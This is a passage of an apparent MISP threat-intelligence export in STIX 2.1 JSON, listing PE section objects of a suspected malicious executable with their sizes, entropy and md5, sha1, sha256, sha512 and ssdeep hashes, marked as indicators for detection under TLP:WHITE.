"value": "12288",
"category": "Other",
"uuid": "a9d9c4fb-0f1b-4da7-b648-4b4076d6a949"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.6775358173282",
"category": "Other",
"uuid": "ba24c52b-8652-4f97-8f8a-eac7066f35da"
},
{
"type": "md5",
"object_relation": "md5",
"value": "942ccd316a0ee518903e4835680d1881",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ff4673d1-baae-4215-97d6-98ea38fa85c8"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "20c7e874-c65d-43ce-9182-19767af29a96"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "3bb74816-35df-4e00-ac7b-27600b25cb8f"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2acebc68-ac24-4142-bb8b-2153327f78f1"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e28799f0-ca4d-4387-8d3e-cbf555c37642"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:40:16.000Z",
"modified": "2020-08-02T18:40:16.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "731fc26b-ca0f-4128-9341-4c50111efd41"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "12288",
"category": "Other",
"uuid": "de439331-8add-4208-b003-2d4d8e2150dd"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.6775358173282",
"category": "Other",
"uuid": "fd66d66c-ac27-4030-a798-a7e93b0a541a"
},
{
"type": "md5",
"object_relation": "md5",
"value": "942ccd316a0ee518903e4835680d1881",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a6b0963f-0575-4067-af56-b7058a2b5b99"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a33a4b9f-31ce-45ec-a5f9-47f1ffc98384"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2ae21ea6-f77c-47dc-9c88-f7da7c38992d"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841",
"category": "Payload delivery",
"to_ids": true,
"uuid": "9fbefbb9-f09a-4010-a067-9088c46604f1"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "4e4b35a9-f9fc-4fb9-9833-75c2b261c0d9"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:40:23.000Z",
"modified": "2020-08-02T18:40:23.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "7bf0f1c8-9605-4195-a8b3-6e6ea32eade6"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "bc1cbecc-7502-43c0-b231-5802452feee3"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9900939465467",
"category": "Other",
"uuid": "141fcc00-e7da-40f0-ab02-d471bad2c443"
},
{
"type": "md5",
"object_relation": "md5",
"value": "55969439752184b954d17e57a02ead13",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e1fb44e1-479d-4e34-87d2-f3ba9ec79ecd"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "680dee4f-fbb9-4410-ab4c-6298a791bb19"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705",
"category": "Payload delivery",
"to_ids": true,
"uuid": "81470ab2-aff0-425a-97ad-55f1b4896bb9"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc",
"category": "Payload delivery",
"to_ids": true,
"uuid": "f2f20b2d-cb5c-4781-b3c5-c7fdde33fde3"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6e091a0c-0855-40f7-add2-6c80515b795f"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:41:25.000Z",
"modified": "2020-08-02T18:41:25.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "a1c86d9f-897f-48a9-a8c5-327bce630d35"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "10e6d201-dd9b-45ee-aaf8-4d1d3c0df088"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9900939465467",
"category": "Other",
"uuid": "4e70dba5-9b88-4a31-9711-54b25fdecaea"
},
{
"type": "md5",
"object_relation": "md5",
"value": "55969439752184b954d17e57a02ead13",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5633014a-2883-4ad0-8ac8-609587d28d3a"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "0b9dc2cf-1584-45b6-a6e3-652b330875b6"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e4a7253c-94bd-487d-a995-d65988be8b06"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5fc5c62c-d808-427f-b7fc-8ce4776bf62e"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ed4b4255-a9ce-4c32-8ed6-259f5059c932"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:41:47.000Z",
"modified": "2020-08-02T18:41:47.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "2ab03bf0-15e4-4eb2-af30-92242bf54ffb"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "000942ea-74e1-43dd-959b-066f96704a0f"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.8568053112406",
"category": "Other",
"uuid": "97ca357e-b6b9-46c8-b15a-6008a5b3208b"
},
{
"type": "md5",
"object_relation": "md5",
"value": "c59b7c6bdf6d3b6475e830d444c16279",
"category": "Payload delivery",
"to_ids": true,
"uuid": "017f1fee-7052-44ab-a44e-fef1ea8029a6"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "4228bd6f4751581bcd745a808244e531568aba61",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2276cac0-c9a4-4267-b95d-da9ead48dd8a"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8142c5b2-a53b-4128-98e8-ea2ba4436b4c"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b",
"category": "Payload delivery",
"to_ids": true,
"uuid": "fec67a7c-092d-4a82-b7eb-064c8bca18d9"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5f0ed13d-ba7c-460f-83bc-03d21be6ef6e"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:43:00.000Z",
"modified": "2020-08-02T18:43:00.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "ee88ca61-1273-40df-b15e-7c1cef7a5422"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "ae6080f0-382a-4d2e-b54b-78bbbfd6db95"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.8568053112406",
"category": "Other",
"uuid": "8f146a4a-41de-41f6-bae9-4a6a1f266488"
},
{
"type": "md5",
"object_relation": "md5",
"value": "c59b7c6bdf6d3b6475e830d444c16279",
"category": "Payload delivery",
"to_ids": true,
"uuid": "be5d5eba-b42b-4d77-88c9-200eee1782a3"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "4228bd6f4751581bcd745a808244e531568aba61",
"category": "Payload delivery",
"to_ids": true,
"uuid": "28495c52-a066-4c3e-9c80-e4c498da2333"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7533d176-2922-49e4-91b5-50db38c441f8"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b",
"category": "Payload delivery",
"to_ids": true,
"uuid": "959e75c1-5c91-4246-9ef3-f79bad253842"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY",
"category": "Payload delivery",
"to_ids": true,
"uuid": "bb826f80-d656-4650-ad25-5871e58a5699"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:43:24.000Z",
"modified": "2020-08-02T18:43:24.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "992e2373-7cf4-4f4a-98a1-2fae9ceeb893"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "1c84aa0f-d3cb-4f9d-bd33-a530c005aa02"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3542400671361",
"category": "Other",
"uuid": "51647ac3-e887-4fef-b56e-dc9a3cafd699"
},
{
"type": "md5",
"object_relation": "md5",
"value": "fcd1605d1d9f49547d0d1a001563946a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8a766358-7028-4969-8feb-c5542a366574"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6ee6d0a6-f0dd-430c-98b8-6b6b8c369f52"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e2f9f32d-4c2c-43c4-bac7-c428469b6743"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a9a39f3a-fbc1-436f-8c00-e46953d761d2"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1de2af3c-0377-4636-914c-2b99e6e53694"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:44:24.000Z",
"modified": "2020-08-02T18:44:24.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "aea237dc-3990-42c9-a520-c16735707264"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "f9e63bb3-b550-44da-bb6e-c5273377f0a5"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3542400671361",
"category": "Other",
"uuid": "43db1d82-3c06-4b43-be0d-ebd732243699"
},
{
"type": "md5",
"object_relation": "md5",
"value": "fcd1605d1d9f49547d0d1a001563946a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "52d1185b-7538-4358-bf79-3a8df1aece8c"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8aa6dd94-f17b-43f8-8cb0-2194177bcd83"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "c3dc63c7-0999-4fa9-b354-9714660470f5"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257",
"category": "Payload delivery",
"to_ids": true,
"uuid": "4b1faca7-16d1-4fb2-a34a-c2ce3323da95"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "75cfed24-ec5f-4065-8335-37cb548fb06a"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:45:01.000Z",
"modified": "2020-08-02T18:45:01.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "06dea17e-b60d-4211-8f31-8f036cfba40b"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "0de40bf8-81df-4961-86c9-4e16ff2e15e2"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.9461169615076",
"category": "Other",
"uuid": "a3ca1adf-67fa-42a8-96c1-f3cfc983eb3c"
},
{
"type": "md5",
"object_relation": "md5",
"value": "2e582f4b09f310087abc12cfbf505d06",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6b061b3f-634c-4229-a9d8-cc8979311f1e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "c36c52f0-0ec1-4749-a2e1-9f2fe1fbac00"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1018c326-f42a-4ada-bee0-6753036899c8"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5307695d-e49d-42bc-98d1-3c309fb668ce"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1c9fff4a-4705-4728-b3f1-25cbb0a08bf6"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--072b4d8e-b602-458e-9a96-71242a752828",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:45:51.000Z",
"modified": "2020-08-02T18:45:51.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "f3a2141e-1665-4f09-8239-0f5f1136a6ee"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "db905034-d0c9-473e-8e90-748edeaec6e8"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.9461169615076",
"category": "Other",
"uuid": "5d4c0ee8-ddef-4bb7-8828-8e0cc15edea8"
},
{
"type": "md5",
"object_relation": "md5",
"value": "2e582f4b09f310087abc12cfbf505d06",
"category": "Payload delivery",
"to_ids": true,
"uuid": "81abf6c2-3ef7-44dd-897c-e71f1f7ee662"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ae0607e4-2deb-4276-ab36-ee504bdf95af"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "621cedb3-22b0-49d3-b41d-8aed1cf563c2"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107",
"category": "Payload delivery",
"to_ids": true,
"uuid": "39882cc0-0ea1-44ec-8532-90ab9ca93fc6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d92abd90-8a08-44e9-b5f5-3ce18363dacc"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}